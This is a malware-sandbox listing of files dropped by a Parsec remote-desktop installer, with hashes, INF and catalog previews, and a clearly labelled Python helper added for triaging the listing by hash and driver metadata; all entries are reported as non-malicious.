                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12001
                            Entropy (8bit):7.346082125667387
                            Encrypted:false
                            SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                            MD5:CFE9C8FD6FAF915A653D39895D3D0862
                            SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                            SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                            SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):263336
                            Entropy (8bit):6.416646624342821
                            Encrypted:false
                            SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                            MD5:591AB089C7184E33D0F4DB12B4CA5498
                            SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                            SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                            SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................
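The records above list the same artifact more than once: the 12288-byte DLL with SHA-256 8DC562CD… is dropped by parsec-vdd.exe, parsec-windows.exe and parsec-vud.exe, and the parsecvusba driver package (.cat, .inf, .sys) appears twice under nefconw.exe. When triaging such a listing, the first things a practitioner wants are a per-hash view (how many distinct files were really written, and by which parents), the kernel-mode images singled out (the report's own signature is "Sample is not signed and drops a device driver"), and the driver package's metadata pulled from the INF (catalog name, DriverVer, PnpLockdown, and the root-enumerated hardware ID it installs under). The script below is an added example written for this page; it is not Joe Sandbox's or Parsec's code. It assumes the flat "Key:Value" layout shown here and the sandbox convention of rendering each CRLF in a text preview as "..". The SAMPLE text is a constructed excerpt whose values are copied from the listing above, with most records and fields omitted and the INF preview truncated.

```python
"""Triage helper for a sandbox "Dropped Files" listing (added example).

Groups records by SHA-256, flags native (kernel-mode) images and extracts
driver-package metadata from INF previews.
"""
import json
import re
from collections import defaultdict

# Constructed excerpt: values copied from the report above, heavily trimmed.
SAMPLE = r"""
Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):12288
SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):12288
SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):12288
SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):263336
SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
Malicious:false
Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
File Type:Windows setup INFormation
Category:dropped
Size (bytes):3005
SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
Malicious:false
Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....
"""


def parse_records(text):
    """One dict per dropped file; a record starts at each "Process:" line.
    Bullet lines ("• Antivirus: ...") go into the record's "av" list."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            _, _, item = line.lstrip("• ").partition(":")
            if records:
                records[-1].setdefault("av", []).append(item.strip())
            continue
        key, sep, value = line.partition(":")   # first colon only: values hold paths
        if not sep:
            continue
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value.strip()
    return records


def group_by_sha256(records):
    """Collapse duplicate drops: one entry per hash with every dropping process."""
    groups = defaultdict(lambda: {"droppers": set(), "size": None, "type": None})
    for rec in records:
        sha = rec.get("SHA-256", "").lower()
        if sha:
            g = groups[sha]
            g["droppers"].add(rec.get("Process", "?"))
            g["size"], g["type"] = rec.get("Size (bytes)"), rec.get("File Type")
    return dict(groups)


def is_kernel_image(rec):
    """'(native)' in the file type marks a kernel-mode PE such as a .sys."""
    return "(native)" in rec.get("File Type", "")


def inf_metadata(preview):
    """[Version] keys plus hardware IDs from [Standard.*] sections.
    The preview shows each CRLF as '..'; single dots (names, versions) are kept."""
    meta, hw_ids, section = {}, [], None
    for line in re.split(r"\.{2,}", preview):
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        if section == "Version":
            meta[key.strip()] = value.strip()
        elif section and section.startswith("Standard."):
            parts = [p.strip() for p in value.split(",")]   # "Install, HwId"
            if len(parts) == 2:
                hw_ids.append(parts[1])
    meta["HardwareIds"] = hw_ids
    return meta


def triage(text):
    """Summary: distinct files, multi-dropper hashes, kernel images, INF data."""
    records = parse_records(text)
    groups = group_by_sha256(records)
    multi = {s: sorted(g["droppers"]) for s, g in groups.items() if len(g["droppers"]) > 1}
    kernel = sorted({r["SHA-256"].lower() for r in records if is_kernel_image(r)})
    infs = [inf_metadata(r["Preview"]) for r in records
            if r.get("File Type") == "Windows setup INFormation" and "Preview" in r]
    return {"unique_files": len(groups), "multi_dropper": multi,
            "kernel_images": kernel, "driver_packages": infs}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

On the excerpt this reports three distinct files rather than five records, names the three Parsec processes that all write the 8DC562CD… DLL, isolates the 263336-byte native image as the one kernel-mode drop, and reads CatalogFile=parsecvusba.cat, DriverVer 03/06/2024,0.2.8.0, PnpLockdown=1 and the software-enumerated hardware ID Root\Parsec\VUSBA out of the INF. Those INF fields tell you which catalog to check on a live host with `signtool verify /kp` or `Get-AuthenticodeSignature` before deciding whether the dropped driver is the vendor's signed package or something riding on its name.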
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11928
                            Entropy (8bit):7.349994571032463
                            Encrypted:false
                            SSDEEP:192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
                            MD5:1FE1FC7CC73FB17E995D65835D51CA94
                            SHA1:249ACF0A3A362B2163127BD76F6D4D6AA463297D
                            SHA-256:136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
                            SHA-512:31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):173736
                            Entropy (8bit):6.232270251717221
                            Encrypted:false
                            SSDEEP:3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
                            MD5:F09967CC8CC9BF03612DDECB6BF86DAA
                            SHA1:166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
                            SHA-256:96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
                            SHA-512:190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):4122
                            Entropy (8bit):3.7080252993527285
                            Encrypted:false
                            SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                            MD5:D8030AFE09A2F984BE00389B31F7039B
                            SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                            SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                            SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                            Malicious:false
                            Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11928
                            Entropy (8bit):7.349994571032463
                            Encrypted:false
                            SSDEEP:192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
                            MD5:1FE1FC7CC73FB17E995D65835D51CA94
                            SHA1:249ACF0A3A362B2163127BD76F6D4D6AA463297D
                            SHA-256:136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
                            SHA-512:31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):173736
                            Entropy (8bit):6.232270251717221
                            Encrypted:false
                            SSDEEP:3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
                            MD5:F09967CC8CC9BF03612DDECB6BF86DAA
                            SHA1:166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
                            SHA-256:96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
                            SHA-512:190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):4122
                            Entropy (8bit):3.7080252993527285
                            Encrypted:false
                            SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                            MD5:D8030AFE09A2F984BE00389B31F7039B
                            SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                            SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                            SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                            Malicious:false
                            Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11858
                            Entropy (8bit):7.334407083811773
                            Encrypted:false
                            SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                            MD5:560EFA3FA6E5AB486D958B12207AC6ED
                            SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                            SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                            SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                            Malicious:false
                            Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):26680
                            Entropy (8bit):6.39482709996269
                            Encrypted:false
                            SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                            MD5:0790B2E5B9D6B38B566C6BC796F0364A
                            SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                            SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                            SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11858
                            Entropy (8bit):7.334407083811773
                            Encrypted:false
                            SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                            MD5:560EFA3FA6E5AB486D958B12207AC6ED
                            SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
